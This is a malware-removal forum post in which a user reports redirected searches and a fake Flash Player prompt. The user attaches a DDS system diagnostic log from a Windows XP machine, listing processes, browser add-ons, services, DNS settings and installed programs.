Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help, and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.

Malware Removal Instructions

redirected searches and email problems

MalwareRemoval.com provides free support for people with infected computers. Using plain language that anyone can understand, our community of volunteer experts will walk you through each step.

redirected searches and email problems

Unread postby ard » June 9th, 2011, 9:59 am

my searches are almost always redirected to unrelated sites. the problem began on 6-2-2011 I think. i got a screen about microsoft xp recovery software - which i did not run. When viewing email using explorer i get a message requesting the loading of Flash Player 9.0 - it looks like this


flash required for this application

Your browser must have Flash 9.0 or higher installed to add this
application. You can download and install the latest Flash Player
here

OK

thanks al -

DDS.TXT --------------------------------------------------------------------------------------------
.
DDS (Ver_2011-06-03.01) - NTFSx86
Internet Explorer: 8.0.6001.18702
Run by admin at 15:51:03 on 2011-06-08
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.510.175 [GMT -4:00]
.
AV: AntiVir Desktop *Enabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
AV: Sunbelt VIPRE *Disabled/Outdated* {964FCE60-0B18-4D30-ADD6-EB178909041C}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k netsvcs
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
svchost.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\taskmgr.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\internet explorer\iexplore.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Connection Wizard,ShellNext = iexplore
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049c3e9-b461-4bc5-8870-4c09146192ca} - c:\documents and settings\all users\application data\real\realplayer\browserrecordplugin\ie\rpbrowserrecordplugin.dll
BHO: Spybot-S&D IE Protection: {53707962-6f74-2d53-2644-206d7942484f} - c:\program files\spybot - search & destroy\SDHelper.dll
BHO: Skype add-on for Internet Explorer: {ae805869-2e5c-4ed4-8f7b-f1f7851a4497} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
TB: {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
TB: {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No File
TB: Google Toolbar: {2318c2b1-4965-11d4-9b18-009027a5cd4f} - c:\program files\google\google toolbar\GoogleToolbar_32.dll
TB: {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
TB: MyAshampoo Toolbar: {a1e75a0e-4397-4ba8-bb50-e19fb66890f4} - c:\program files\myashampoo\tbMyA1.dll
TB: {472734EA-242A-422B-ADF8-83D1E48CC825} - No File
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
mRun: [MSConfig] c:\windows\pchealth\helpctr\binaries\MSCONFIG.EXE /auto
mPolicies-explorer: NoResolveTrack = 0 (0x0)
mPolicies-explorer: NoFileAssociate = 0 (0x0)
mPolicies-system: HideShutdownScripts = 0 (0x0)
mPolicies-system: NoDispSettingsPage = 0 (0x0)
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
Trusted Zone: magicjack.com\my
Trusted Zone: talk4free.com\reg
DPF: {B1E2B96C-12FE-45E2-BEF1-44A219113CDD} - hxxp://www.superadblocker.com/activex/sabspx.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinsta ... s-i586.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
TCP: DhcpNameServer = 192.168.0.1
TCP: Interfaces\{F1AACA3A-E5BE-452E-9F2E-0E4D30CBE236} : NameServer = 67.90.152.122,67.107.71.186
TCP: Interfaces\{F1AACA3A-E5BE-452E-9F2E-0E4D30CBE236} : DhcpNameServer = 192.168.0.1
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.DLL
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
SEH: SABShellExecuteHook Class: {5ae067d3-9afb-48e0-853a-ebb7f4a000da} - c:\program files\superantispyware\SASSEH.DLL
.
============= SERVICES / DRIVERS ===============
.
R1 avgio;avgio;c:\program files\avira\antivir desktop\avgio.sys [2009-9-15 11608]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2010-2-17 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2010-5-10 67656]
R1 sbaphd;sbaphd;c:\windows\system32\drivers\sbaphd.sys [2011-3-22 21464]
R1 SBRE;SBRE;c:\windows\system32\drivers\SBREDrv.sys [2010-5-13 98392]
R1 SbTis;SbTis;c:\windows\system32\drivers\sbtis.sys [2011-3-22 212568]
R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\avira\antivir desktop\sched.exe [2009-9-15 135336]
R2 AntiVirService;Avira AntiVir Guard;c:\program files\avira\antivir desktop\avguard.exe [2009-9-15 269480]
R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2009-9-15 61960]
R2 sbapifs;sbapifs;c:\windows\system32\drivers\sbapifs.sys [2011-3-22 69976]
R3 CAM1690;USB PC Camera;c:\windows\system32\drivers\cam1690.sys [2007-9-20 181888]
R3 PbsAuDrv;PolderbitS Audio Driver;c:\windows\system32\drivers\pbsaudrv.sys [2009-8-1 110752]
R3 RRNetCapMP;RRNetCapMP;c:\windows\system32\drivers\rrnetcap.sys [2010-1-6 27168]
S2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2009-9-4 366640]
S3 ADM8511;ADMtek ADM8511/AN986 USB To Fast Ethernet Converter;c:\windows\system32\drivers\ADM8511.SYS [2005-7-26 20160]
S3 cpuz130;cpuz130;\??\c:\docume~1\admin\locals~1\temp\cpuz130\cpuz_x32.sys --> c:\docume~1\admin\locals~1\temp\cpuz130\cpuz_x32.sys [?]
S3 ionwpvvc;Watchport/V2 USB Camera;c:\windows\system32\drivers\ionwpvvc.sys [2008-2-20 38656]
S3 MBAMProtector;MBAMProtector;\??\c:\windows\system32\drivers\mbam.sys --> c:\windows\system32\drivers\mbam.sys [?]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [2009-9-4 39984]
S3 nosGetPlusHelper;getPlus(R) Helper 3004;c:\windows\system32\svchost.exe -k nosGetPlusHelper [2009-8-15 14336]
S3 RRNetCap;RRNetCap Service;c:\windows\system32\drivers\rrnetcap.sys [2010-1-6 27168]
S4 Compass Server;Compass Server; [x]
S4 DfSdkS;Defragmentation-Service;c:\program files\ashampoo\ashampoo winoptimizer 7\DfSdkS.exe [2011-4-13 406016]
S4 gupdate;Google Update Service (gupdate);c:\program files\google\update\GoogleUpdate.exe [2010-10-19 136176]
S4 gupdatem;Google Update Service (gupdatem);c:\program files\google\update\GoogleUpdate.exe [2010-10-19 136176]
S4 magicJack;magicJack;c:\mjusbsp\srvany.exe [2011-2-27 8192]
S4 nlsX86cc;NLS Service;c:\windows\system32\nlssrv32.exe --> c:\windows\system32\NLSSRV32.EXE [?]
S4 SBAMSvc;VIPRE Antivirus;c:\program files\sunbelt software\vipre\SBAMSvc.exe [2010-8-20 2763080]
S4 SBPIMSvc;SB Recovery Service;c:\program files\sunbelt software\vipre\SBPIMSvc.exe [2010-8-20 181584]
.
=============== Created Last 30 ================
.
2011-06-07 11:47:57 -------- d-----w- c:\documents and settings\admin\application data\AVG10
2011-06-07 11:36:56 -------- d--h--w- c:\documents and settings\all users\application data\Common Files
2011-06-07 11:32:39 -------- d-----w- c:\windows\system32\drivers\AVG
2011-06-07 11:32:39 -------- d-----w- c:\documents and settings\all users\application data\AVG10
2011-06-07 11:31:21 -------- d-----w- c:\program files\AVG
2011-06-07 11:24:58 -------- d-----w- c:\documents and settings\all users\application data\MFAData
2011-06-06 17:09:06 -------- d-----w- c:\program files\AVAST Software
2011-06-06 17:09:06 -------- d-----w- c:\documents and settings\all users\application data\AVAST Software
2011-06-06 16:57:10 -------- d-----w- c:\program files\SpywareBlaster
2011-06-05 13:16:05 -------- d-----w- c:\documents and settings\all users\application data\SUPERAntiSpyware.com
2011-06-05 13:16:05 -------- d-----w- c:\documents and settings\admin\application data\SUPERAntiSpyware.com
2011-06-05 13:15:07 -------- d-----w- c:\program files\SUPERAntiSpyware
2011-06-05 07:45:48 -------- d-----w- c:\program files\Spybot - Search & Destroy
2011-06-04 20:00:33 -------- d-----w- c:\documents and settings\admin\local settings\application data\Threat Expert
2011-06-04 16:32:48 -------- d-----w- c:\program files\Watchtower
2011-06-04 15:19:59 -------- d-----w- c:\windows\system32\wbem\repository\FS
2011-06-04 15:19:59 -------- d-----w- c:\windows\system32\wbem\Repository
2011-06-04 14:15:34 -------- d-----w- C:\- PDF docs
2011-06-04 14:15:20 -------- d-----w- C:\- maps
2011-06-04 13:55:41 -------- d-----w- C:\- JW info
2011-06-04 13:55:39 -------- d-----w- C:\- money
2011-06-04 13:55:39 -------- d-----w- C:\- bank
2011-06-04 13:55:38 -------- d-----w- C:\- XL docs
2011-06-04 13:55:34 -------- d-----w- C:\- word docs
2011-06-04 13:54:03 -------- d-----w- C:\- sounds
2011-06-04 13:53:51 -------- d-----w- C:\- powerpoint
2011-06-04 00:37:44 331805736 ----a-w- c:\temp\windowsxp-kb936929-sp3-x86-enu_c81472f7eeea2eca421e116cd4c03e2300ebfde4.exe
2011-06-04 00:30:49 4608744 ----a-w- c:\temp\WindowsXP_KB310994_SP2_Pro_BootDisk_ENU.exe
2011-05-16 13:45:30 7040 ----a-w- c:\windows\system32\sabprocenum.sys
.
==================== Find3M ====================
.
2011-06-04 16:09:13 107 ----a-w- c:\documents and settings\admin\application data\netstat.bat
2011-05-29 13:11:30 39984 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
.
============= FINISH: 15:52:15.32 ===============


-----------------------------------------------------------------------------------------------------
.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2011-06-03.01)
.
Microsoft Windows XP Home Edition
Boot Device: \Device\HarddiskVolume2
Install Date: 7/26/2005 6:25:11 PM
System Uptime: 6/8/2011 2:48:57 PM (1 hours ago)
.
Motherboard: Dell Inc. | | 0X8582
Processor: Intel(R) Pentium(R) 4 CPU 3.00GHz | Microprocessor | 2992/800mhz
.
==== Disk Partitions =========================
.
A: is Removable
C: is FIXED (NTFS) - 145 GiB total, 48.738 GiB free.
D: is CDROM ()
E: is CDROM ()
F: is Removable
G: is Removable
H: is Removable
I: is Removable
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP161: 9/17/2010 3:29:20 PM - Installed DeLorme Phone Data 2011.
RP162: 9/25/2010 11:14:46 AM - Installed Microsoft Fix it 50027
RP163: 9/27/2010 1:55:48 PM - Removed DeLorme Phone Data 2011.
RP164: 9/27/2010 1:58:49 PM - Removed DeLorme Street Atlas USA 2011 Plus.
RP165: 9/28/2010 2:37:58 PM - Configured Microsoft Office Standard 2007
RP166: 10/16/2010 2:38:49 PM - Software Distribution Service 3.0
RP167: 10/18/2010 1:44:08 PM - Installed DeLorme Street Atlas USA 2011 Plus.
RP168: 10/18/2010 1:55:15 PM - Installed DeLorme Phone Data 2011.
RP169: 10/25/2010 10:11:25 AM - Installed Microsoft Office PowerPoint Viewer 2007 (English)
RP170: 11/5/2010 10:53:42 AM - Software Distribution Service 3.0
RP171: 11/12/2010 1:14:47 PM - Software Distribution Service 3.0
RP172: 11/18/2010 11:46:13 AM - Software Distribution Service 3.0
RP173: 11/29/2010 4:14:39 PM - Installed Nitro PDF Professional
RP174: 11/30/2010 10:54:33 AM - Removed Nitro PDF Professional
RP175: 12/14/2010 10:18:01 AM - Removed Acrobat.com
RP176: 12/25/2010 9:35:58 AM - Software Distribution Service 3.0
RP177: 1/12/2011 2:16:14 PM - Software Distribution Service 3.0
RP178: 1/15/2011 11:13:57 AM - Installed VueMinder Calendar Lite
RP179: 2/27/2011 4:53:30 PM - Software Distribution Service 3.0
RP180: 2/27/2011 5:08:37 PM - Removed VueMinder Calendar Lite
RP181: 2/27/2011 5:12:07 PM - Removed Microsoft Office Converter Pack
RP182: 2/27/2011 5:12:48 PM - Removed Microsoft Office Excel Viewer 2003
RP183: 2/27/2011 5:20:14 PM - Configured Microsoft Office Standard 2007
RP184: 2/27/2011 5:24:41 PM - Configured Microsoft Office Standard 2007
RP185: 2/27/2011 6:04:06 PM - Installed The Ultimate Library by ReaderRom
RP186: 2/27/2011 6:13:48 PM - Removed The Ultimate Library by ReaderRom
RP187: 2/27/2011 6:21:49 PM - Installed The Ultimate Library by ReaderRom
RP188: 2/27/2011 6:26:24 PM - Removed The Ultimate Library by ReaderRom
RP189: 2/28/2011 4:43:18 PM - Software Distribution Service 3.0
RP190: 3/4/2011 4:30:49 PM - Installed Windows Resource Kit Tools
RP191: 3/9/2011 8:14:28 PM - Software Distribution Service 3.0
RP192: 3/17/2011 4:41:35 PM - Removed Adobe Reader 9.4.2.
RP193: 3/17/2011 4:42:06 PM - Installed Adobe Reader X (10.0.1).
RP194: 3/19/2011 11:46:56 AM - Removed Ask Toolbar.
RP195: 3/19/2011 11:50:04 AM - Removed MAZE
RP196: 3/19/2011 11:55:28 AM - Removed PixiePack Codec Pack
RP197: 3/19/2011 11:56:31 AM - Removed Bing Maps 3D
RP198: 3/22/2011 7:57:35 AM - Installed VIPRE Antivirus.
RP199: 3/25/2011 7:53:27 AM - Software Distribution Service 3.0
RP200: 4/13/2011 11:48:48 AM - Removed Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
RP201: 4/13/2011 11:50:33 AM - Removed Microsoft Visual C++ 2005 Redistributable
RP202: 4/13/2011 11:52:35 AM - Removed Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
RP203: 4/13/2011 11:53:55 AM - Removed Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
RP204: 4/13/2011 11:55:09 AM - Removed Microsoft Visual C++ 2005 Redistributable
RP205: 4/14/2011 10:35:03 AM - Removed e-Sword
RP206: 4/14/2011 10:35:18 AM - Installed e-Sword
RP207: 4/14/2011 10:50:12 AM - Removed e-Sword
RP208: 4/14/2011 10:55:14 AM - Installed e-Sword
RP209: 4/14/2011 3:40:37 PM - Installed Microsoft Visual C++ 2005 Redistributable
RP210: 4/17/2011 6:13:20 PM - Software Distribution Service 3.0
RP211: 4/30/2011 1:00:14 PM - Software Distribution Service 3.0
RP212: 6/2/2011 11:58:58 AM - Software Distribution Service 3.0
RP213: 6/3/2011 7:52:56 PM - Software Distribution Service 3.0
RP214: 6/3/2011 8:56:00 PM - Software Distribution Service 3.0
RP215: 6/4/2011 11:14:43 AM - Restore Operation
RP216: 6/5/2011 2:58:59 AM - Software Distribution Service 3.0
RP217: 6/6/2011 1:09:06 PM - avast! Free Antivirus Setup
RP218: 6/7/2011 7:31:19 AM - Installed AVG 2011
RP219: 6/7/2011 7:32:14 AM - Installed AVG 2011
RP220: 6/8/2011 9:55:13 AM - Removed AVG 2011
RP221: 6/8/2011 9:58:38 AM - Removed AVG 2011
RP222: 6/8/2011 10:17:41 AM - avast! Free Antivirus Setup
RP223: 6/8/2011 11:07:18 AM - Removed Adobe Reader X (10.0.1).
.
==== Installed Programs ======================
.
Sansa Media Converter
3ivx D4 4.5.1 Decoder (remove only)
50 Games Collection
Adobe AIR
Amazon Kindle For PC v1.1
Apple Application Support
Apple Mobile Device Support
Apple Software Update
Ashampoo WinOptimizer 7 v.7.26
ATI Control Panel
ATI Display Driver
Audacity 1.2.6
Avira AntiVir Personal - Free Antivirus
AviSynth 2.5
AVS Audio Converter version 6.1
AVS Audio Editor version 5.2
AVS Image Converter 1.2.1.100
AVS Photo Editor
AVS Update Manager 1.0
AVS Video Converter 6
AVS Video Editor 4 4.2.1.165
AVS Video Recorder 2.4 (Service Version)
AVS YouTube Uploader version 2.1
AVS4YOU Software Navigator 1.4
Bonjour
Brother HL-2140
ClocX (1.5b1)
Compatibility Pack for the 2007 Office system
CrossHair
Cucusoft YouTube Mate 8.05
CutePDF Writer 2.8
Dell Digital Jukebox Driver
Dell Driver Reset Tool
Dell Photo AIO Printer 962
Dell Support Center (Support Software)
Dell System Restore
DellSupport
DeLorme Phone Data 2011
DeLorme Street Atlas USA 2011 Plus
Direct MIDI to MP3 Converter version 6.0.0.27
DNA
dvdSanta 4.50
DVDStyler v1.7.1
e-Sword
Encyclopædia Britannica Profiles : World Religions CD-ROM
ERUNT 1.1j
ESET Online Scanner v3
Free Natural Text to Speech Reader 2008
Futuremark SystemInfo
getPlus(R) for Adobe
Google Chrome
Google Earth Plug-in
Google Toolbar for Internet Explorer
Google Update Helper
Google Video Player
High Definition Audio Driver Package - KB835221
HijackThis 2.0.2
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
Hotfix for Windows Media Format 11 SDK (KB929399)
Hotfix for Windows Media Player 11 (KB939683)
Hotfix for Windows XP (KB2158563)
Hotfix for Windows XP (KB2443685)
Hotfix for Windows XP (KB952287)
Hotfix for Windows XP (KB954550-v5)
Hotfix for Windows XP (KB961118)
Hotfix for Windows XP (KB970653-v3)
Hotfix for Windows XP (KB976098-v2)
Hotfix for Windows XP (KB979306)
Hotfix for Windows XP (KB981793)
Inside Out Networks Watchport/V Drivers (Remove only)
Intel Matrix Storage Manager
Intel(R) PRO Network Connections Software v9.2.4.11
Intel(R) PROSafe for Wired Connections
Internet Explorer Default Page
ISA 2 basic
ISA 2.0 - YLT module 1.2.1
ISA_CLV_module 1.2.0
iTunes
Java Auto Updater
Java(TM) 6 Update 20
LADSPA_plugins-win-0.4.15
Macromedia Flash Player
magicJack
magicJack Recovery Tool 1.0
Malwarebytes' Anti-Malware version 1.51.0.1200
Managed DirectX (0900)
MapSphere
Microsoft .NET Framework 1.1
Microsoft .NET Framework 1.1 Security Update (KB2416447)
Microsoft .NET Framework 1.1 Security Update (KB979906)
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.0 Service Pack 2
Microsoft .NET Framework 3.5 SP1
Microsoft Automated Troubleshooting Services Shim
Microsoft Compression Client Pack 1.0 for Windows XP
Microsoft Internationalized Domain Names Mitigation APIs
Microsoft Kernel-Mode Driver Framework Feature Pack 1.5
Microsoft Kernel-Mode Driver Framework Feature Pack 1.7
Microsoft National Language Support Downlevel APIs
Microsoft Office 2007 Service Pack 2 (SP2)
Microsoft Office Excel MUI (English) 2007
Microsoft Office Outlook MUI (English) 2007
Microsoft Office PowerPoint MUI (English) 2007
Microsoft Office PowerPoint Viewer 2007 (English)
Microsoft Office Proof (English) 2007
Microsoft Office Proof (French) 2007
Microsoft Office Proof (Spanish) 2007
Microsoft Office Proofing (English) 2007
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
Microsoft Office Shared MUI (English) 2007
Microsoft Office Shared Setup Metadata MUI (English) 2007
Microsoft Office Standard 2007
Microsoft Office Word MUI (English) 2007
Microsoft Picture It! Express 2000
Microsoft Save as PDF Add-in for 2007 Microsoft Office programs
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs
Microsoft Save as XPS Add-in for 2007 Microsoft Office programs
Microsoft Software Update for Web Folders (English) 12
Microsoft Text-to-Speech Engine 4.0 (English)
Microsoft User-Mode Driver Framework Feature Pack 1.0
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Works 2000
MID Converter 4.2
MSXML 4.0 SP2 (KB936181)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MSXML 6 Service Pack 2 (KB954459)
Multimedia Samples
MyAshampoo Toolbar
Naevius GVI Converter 1.3
Nero Suite
Online Bible 10.95
Pistonsoft MP3 Tags Editor
Pistonsoft Text to Speech Converter 1.11.0
PolderbitS Sound Recorder and Editor
PowerDVD 5.5
Print to Fax
PS-Utility
Qualxserve Service Agreement
QuickTime
QuickVerse 7.0
RealPlayer
RealUpgrade 1.0
Security Update for 2007 Microsoft Office System (KB2288621)
Security Update for 2007 Microsoft Office System (KB2288931)
Security Update for 2007 Microsoft Office System (KB2345043)
Security Update for 2007 Microsoft Office System (KB2466156)
Security Update for 2007 Microsoft Office System (KB2509488)
Security Update for 2007 Microsoft Office System (KB969559)
Security Update for CAPICOM (KB931906)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2416473)
Security Update for Microsoft Office Excel 2007 (KB2464583)
Security Update for Microsoft Office InfoPath 2007 (KB979441)
Security Update for Microsoft Office PowerPoint 2007 (KB2535818)
Security Update for Microsoft Office PowerPoint Viewer 2007 (KB2464623)
Security Update for Microsoft Office system 2007 (972581)
Security Update for Microsoft Office system 2007 (KB974234)
Security Update for Microsoft Office Visio Viewer 2007 (KB973709)
Security Update for Microsoft Office Word 2007 (KB2344993)
Security Update for Step By Step Interactive Training (KB898458)
Security Update for Step By Step Interactive Training (KB923723)
Security Update for Windows Internet Explorer 7 (KB938127-v2)
Security Update for Windows Internet Explorer 7 (KB938127)
Security Update for Windows Internet Explorer 7 (KB956390)
Security Update for Windows Internet Explorer 7 (KB961260)
Security Update for Windows Internet Explorer 7 (KB972260)
Security Update for Windows Internet Explorer 8 (KB2183461)
Security Update for Windows Internet Explorer 8 (KB2360131)
Security Update for Windows Internet Explorer 8 (KB2416400)
Security Update for Windows Internet Explorer 8 (KB2482017)
Security Update for Windows Internet Explorer 8 (KB2497640)
Security Update for Windows Internet Explorer 8 (KB2510531)
Security Update for Windows Internet Explorer 8 (KB969897)
Security Update for Windows Internet Explorer 8 (KB971961)
Security Update for Windows Internet Explorer 8 (KB972260)
Security Update for Windows Internet Explorer 8 (KB974455)
Security Update for Windows Internet Explorer 8 (KB976325)
Security Update for Windows Internet Explorer 8 (KB978207)
Security Update for Windows Internet Explorer 8 (KB981332)
Security Update for Windows Media Player (KB2378111)
Security Update for Windows Media Player (KB911564)
Security Update for Windows Media Player (KB952069)
Security Update for Windows Media Player (KB954155)
Security Update for Windows Media Player (KB968816)
Security Update for Windows Media Player (KB973540)
Security Update for Windows Media Player (KB975558)
Security Update for Windows Media Player (KB978695)
Security Update for Windows Media Player 10 (KB911565)
Security Update for Windows Media Player 10 (KB917734)
Security Update for Windows Media Player 10 (KB936782)
Security Update for Windows Media Player 11 (KB936782)
Security Update for Windows Media Player 11 (KB954154)
Security Update for Windows Media Player 6.4 (KB925398)
Security Update for Windows XP (KB2079403)
Security Update for Windows XP (KB2121546)
Security Update for Windows XP (KB2160329)
Security Update for Windows XP (KB2229593)
Security Update for Windows XP (KB2259922)
Security Update for Windows XP (KB2279986)
Security Update for Windows XP (KB2286198)
Security Update for Windows XP (KB2296011)
Security Update for Windows XP (KB2296199)
Security Update for Windows XP (KB2347290)
Security Update for Windows XP (KB2360937)
Security Update for Windows XP (KB2387149)
Security Update for Windows XP (KB2393802)
Security Update for Windows XP (KB2412687)
Security Update for Windows XP (KB2419632)
Security Update for Windows XP (KB2423089)
Security Update for Windows XP (KB2436673)
Security Update for Windows XP (KB2440591)
Security Update for Windows XP (KB2443105)
Security Update for Windows XP (KB2476687)
Security Update for Windows XP (KB2478960)
Security Update for Windows XP (KB2478971)
Security Update for Windows XP (KB2479628)
Security Update for Windows XP (KB2479943)
Security Update for Windows XP (KB2481109)
Security Update for Windows XP (KB2483185)
Security Update for Windows XP (KB2485376)
Security Update for Windows XP (KB2485663)
Security Update for Windows XP (KB2503658)
Security Update for Windows XP (KB2506212)
Security Update for Windows XP (KB2506223)
Security Update for Windows XP (KB2507618)
Security Update for Windows XP (KB2508272)
Security Update for Windows XP (KB2508429)
Security Update for Windows XP (KB2509553)
Security Update for Windows XP (KB2511455)
Security Update for Windows XP (KB2524375)
Security Update for Windows XP (KB923561)
Security Update for Windows XP (KB923689)
Security Update for Windows XP (KB938464-v2)
Security Update for Windows XP (KB938464)
Security Update for Windows XP (KB941569)
Security Update for Windows XP (KB946648)
Security Update for Windows XP (KB950760)
Security Update for Windows XP (KB950762)
Security Update for Windows XP (KB950974)
Security Update for Windows XP (KB951066)
Security Update for Windows XP (KB951376-v2)
Security Update for Windows XP (KB951698)
Security Update for Windows XP (KB951748)
Security Update for Windows XP (KB952004)
Security Update for Windows XP (KB952954)
Security Update for Windows XP (KB954211)
Security Update for Windows XP (KB954459)
Security Update for Windows XP (KB954600)
Security Update for Windows XP (KB955069)
Security Update for Windows XP (KB956572)
Security Update for Windows XP (KB956744)
Security Update for Windows XP (KB956802)
Security Update for Windows XP (KB956803)
Security Update for Windows XP (KB956841)
Security Update for Windows XP (KB956844)
Security Update for Windows XP (KB957097)
Security Update for Windows XP (KB958644)
Security Update for Windows XP (KB958687)
Security Update for Windows XP (KB958869)
Security Update for Windows XP (KB959426)
Security Update for Windows XP (KB960225)
Security Update for Windows XP (KB960715)
Security Update for Windows XP (KB960803)
Security Update for Windows XP (KB960859)
Security Update for Windows XP (KB961371-v2)
Security Update for Windows XP (KB961501)
Security Update for Windows XP (KB968537)
Security Update for Windows XP (KB969059)
Security Update for Windows XP (KB969947)
Security Update for Windows XP (KB970238)
Security Update for Windows XP (KB970430)
Security Update for Windows XP (KB971468)
Security Update for Windows XP (KB971486)
Security Update for Windows XP (KB971557)
Security Update for Windows XP (KB971633)
Security Update for Windows XP (KB971657)
Security Update for Windows XP (KB972270)
Security Update for Windows XP (KB973346)
Security Update for Windows XP (KB973354)
Security Update for Windows XP (KB973507)
Security Update for Windows XP (KB973525)
Security Update for Windows XP (KB973869)
Security Update for Windows XP (KB973904)
Security Update for Windows XP (KB974112)
Security Update for Windows XP (KB974318)
Security Update for Windows XP (KB974392)
Security Update for Windows XP (KB974571)
Security Update for Windows XP (KB975025)
Security Update for Windows XP (KB975467)
Security Update for Windows XP (KB975560)
Security Update for Windows XP (KB975561)
Security Update for Windows XP (KB975562)
Security Update for Windows XP (KB975713)
Security Update for Windows XP (KB977165-v2)
Security Update for Windows XP (KB977816)
Security Update for Windows XP (KB977914)
Security Update for Windows XP (KB978037)
Security Update for Windows XP (KB978251)
Security Update for Windows XP (KB978262)
Security Update for Windows XP (KB978338)
Security Update for Windows XP (KB978542)
Security Update for Windows XP (KB978601)
Security Update for Windows XP (KB978706)
Security Update for Windows XP (KB979309)
Security Update for Windows XP (KB979482)
Security Update for Windows XP (KB979683)
Security Update for Windows XP (KB979687)
Security Update for Windows XP (KB980195)
Security Update for Windows XP (KB980218)
Security Update for Windows XP (KB980232)
Security Update for Windows XP (KB980436)
Security Update for Windows XP (KB981322)
Security Update for Windows XP (KB981852)
Security Update for Windows XP (KB981957)
Security Update for Windows XP (KB981997)
Security Update for Windows XP (KB982132)
Security Update for Windows XP (KB982214)
Security Update for Windows XP (KB982665)
Security Update for Windows XP (KB982802)
Skype Toolbars
Skype™ 4.2
Spybot - Search & Destroy
SpywareBlaster 4.4
SUPERAntiSpyware
Switch Sound File Converter
SyncCell 3.0
TaxACT 2009
TaxACT 2009 Pennsylvania
TaxACT 2010
TaxACT 2010 Pennsylvania
TaxACT Pennsylvania 2006
TaxACT Pennsylvania 2007
TMS Explorer
TTS
Tunebite
TVPCElite
Update for 2007 Microsoft Office System (KB967642)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Microsoft Office Outlook 2007 (KB2509470)
Update for Outlook 2007 Junk Email Filter (KB2536413)
Update for Windows Internet Explorer 8 (KB972636)
Update for Windows Internet Explorer 8 (KB976662)
Update for Windows Internet Explorer 8 (KB976749)
Update for Windows Internet Explorer 8 (KB980182)
Update for Windows XP (KB2141007)
Update for Windows XP (KB2345886)
Update for Windows XP (KB2467659)
Update for Windows XP (KB951978)
Update for Windows XP (KB955759)
Update for Windows XP (KB955839)
Update for Windows XP (KB967715)
Update for Windows XP (KB968389)
Update for Windows XP (KB971029)
